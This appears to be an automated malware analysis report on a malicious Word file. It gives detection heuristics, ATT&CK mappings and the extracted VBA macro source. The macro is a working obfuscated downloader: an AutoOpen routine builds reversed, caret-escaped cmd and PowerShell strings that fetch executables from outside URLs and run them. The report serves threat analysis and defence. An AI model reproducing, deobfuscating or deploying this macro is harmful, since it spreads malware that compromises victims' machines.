MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is a malicious Office document containing a VBA macro. The AutoOpen macro is designed to execute obfuscated code, which likely attempts to download and run a second-stage payload. The presence of the AutoOpen macro and the generic ClamAV detection strongly suggest a malicious intent, likely delivered via spearphishing.
Heuristics 5
-
ClamAV: Doc.Malware.Generic-6688460-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6688460-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5302 bytes |
SHA-256: 460927d0a163c25bc74d5fc751246a4e6a9aab6fe1ea7b957ae481a485815900 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "sbdvUzNo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const UOzNH = 0
Dim WvUij(3)
WvUij(0) = Left(UkwwN, 258)
WvUij(1) = Left(UkwwN, 258)
WvUij(2) = Right(aZwuShj, 499)
Dim HAzkbd(4)
HAzkbd(0) = Mid(IWGWLd, 952, 795)
HAzkbd(1) = MidB(hPXUSJP, 20, 143)
HAzkbd(2) = Right(aZwuShj, 499)
HAzkbd(3) = MidB(hPXUSJP, 20, 143)
Dim wwiYu(2)
wwiYu(0) = Mid(IWGWLd, 952, 795)
wwiYu(1) = MidB(hPXUSJP, 20, 143)
Dim PYDwwL(5)
PYDwwL(0) = MidB(hPXUSJP, 20, 143)
PYDwwL(1) = Left(UkwwN, 258)
PYDwwL(2) = Right(aZwuShj, 499)
PYDwwL(3) = MidB(hPXUSJP, 20, 143)
PYDwwL(4) = MidB(hPXUSJP, 20, 143)
Dim qoiow(2)
qoiow(0) = Left(UkwwN, 258)
qoiow(1) = MidB(hPXUSJP, 20, 143)
Dim HmovQ(5)
HmovQ(0) = Right(aZwuShj, 499)
HmovQ(1) = Right(aZwuShj, 499)
HmovQ(2) = Mid(IWGWLd, 952, 795)
HmovQ(3) = MidB(hPXUSJP, 20, 143)
HmovQ(4) = Mid(IWGWLd, 952, 795)
Dim wEzYEa(4)
wEzYEa(0) = Mid(IWGWLd, 952, 795)
wEzYEa(1) = Left(UkwwN, 258)
wEzYEa(2) = Right(aZwuShj, 499)
wEzYEa(3) = Mid(IWGWLd, 952, 795)
Shell@ uiOZiD + iRpHvzp + UzdbWnt, CInt(UOzNH)
Dim FJdOr(2)
FJdOr(0) = Left(UkwwN, 258)
FJdOr(1) = Mid(IWGWLd, 952, 795)
Dim QWBHa(5)
QWBHa(0) = MidB(hPXUSJP, 20, 143)
QWBHa(1) = MidB(hPXUSJP, 20, 143)
QWBHa(2) = Right(aZwuShj, 499)
QWBHa(3) = Left(UkwwN, 258)
QWBHa(4) = Mid(IWGWLd, 952, 795)
End Sub
Attribute VB_Name = "jwpnlYtSjZ"
Function uiOZiD()
Dim BDjRcD(2)
BDjRcD(0) = Mid(IWGWLd, 952, 795)
BDjRcD(1) = Mid(IWGWLd, 952, 795)
Dim kcSUdB(5)
kcSUdB(0) = Left(UkwwN, 258)
kcSUdB(1) = MidB(hPXUSJP, 20, 143)
kcSUdB(2) = Mid(IWGWLd, 952, 795)
kcSUdB(3) = Left(UkwwN, 258)
kcSUdB(4) = Right(aZwuShj, 499)
Dim OIQTMI(3)
OIQTMI(0) = Mid(IWGWLd, 952, 795)
OIQTMI(1) = Mid(IWGWLd, 952, 795)
OIQTMI(2) = Left(UkwwN, 258)
Dim iNZVHR(3)
iNZVHR(0) = Right(aZwuShj, 499)
iNZVHR(1) = Right(aZwuShj, 499)
iNZVHR(2) = Mid(IWGWLd, 952, 795)
Dim kpSSa(3)
kpSSa(0) = MidB(hPXUSJP, 20, 143)
kpSSa(1) = MidB(hPXUSJP, 20, 143)
kpSSa(2) = Mid(IWGWLd, 952, 795)
FQMwYEV = Format(Chr(18 + 13 + 6 + 15 + 47)) + "md /V^:^ON/" + Format(Chr(12 + 9 + 4 + 10 + 32)) + Format(Chr(5 + 4 + 2 + 4 + 19)) + "^se" + "^t ^X^0= ^ ^ ^ ^ ^ ^" + " ^}^}^{h" + Format(Chr(18 + 13 + 6 + 15 + 47)) + "t^a" + Format(Chr(18 + 13 + 6 + 15 + 47)) + "};k^a^erb;^d^s^j^$^" + " ^met^I^-^ekovn^I;)^d^s" + "^j$ ^,rfG$(e^l^iFd^a^" + "o^ln^wo^D." + "ihI^${" + "^yrt^{)jo^t^$^"
Dim bauGk(4)
bauGk(0) = Mid(IWGWLd, 952, 795)
bauGk(1) = MidB(hPXUSJP, 20, 143)
bauGk(2) = Mid(IWGWLd, 952, 795)
bauGk(3) = Mid(IWGWLd, 952, 795)
Dim GNwkmB(4)
GNwkmB(0) = Right(aZwuShj, 499)
GNwkmB(1) = Right(aZwuShj, 499)
GNwkmB(2) = Mid(IWGWLd, 952, 795)
GNwkmB(3) = MidB(hPXUSJP, 20, 143)
Dim KruoEA(4)
KruoEA(0) = MidB(hPXUSJP, 20, 143)
KruoEA(1) = Left(UkwwN, 258)
KruoEA(2) = Left(UkwwN, 258)
KruoEA(3) = Left(UkwwN, 258)
Dim HLKrQ(5)
HLKrQ(0) = Right(aZwuShj, 499)
HLKrQ(1) = Right(aZwuShj, 499)
HLKrQ(2) = Left(UkwwN, 258)
HLKrQ(3) = Left(UkwwN, 258)
HLKrQ(4) = Right(aZwuShj, 499)
RlOjMosEz = " n^i rfG^$(h" + Format(Chr(18 + 13 + 6 + 15 + 47)) + "^aero^" + "f;'ex^e^.^'^+^z^tP^$^+^'\'+" + Format(Chr(18 + 13 + 6 + 15 + 47)) + "^" + "i^l^bu^p^:vn^e^" + "$^=d^sj"
Dim sodWpt(5)
sodWpt(0) = Mid(IWGWLd, 952, 795)
sodWpt(1) = Right(aZwuShj, 499)
sodWpt(2) = Right(aZwuShj, 499)
sodWpt(3) = Mid(IWGWLd, 952, 795)
sodWpt(4) = MidB(hPXUSJP, 20, 143)
iVwDDbKZ = "$;^'27^9' ^= z^t^P$;)'" + "@^'(^t^il" + "pS.'zHwK^m^q^2" + "^Qd^A/ln.^sr^e^dn^i^" + "er^a//^:^p^t^t^h@^LQ^Ukoii^" + "p/^m^o" + Format(Chr(18 + 13 + 6 + 15 + 47)) + "^.s^tae^t^eer^t" + "s2b//^:^ptth^@" + "i^IF^a" + "m^mu" + Format(Chr(12 + 9 + 4 + 10 + 32)) + "/m^o" + Format(Chr(18 + 13 + 6 + 15 + 47)) + "^.^sn^g^i^se^ded^" + "l^iw^ed//^:^ptth^@^s"
Dim GFEzi(3)
GFEzi(0) = MidB(hPXUSJP, 20, 143)
GFEzi(1) = MidB(hPXUSJP, 20, 1
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.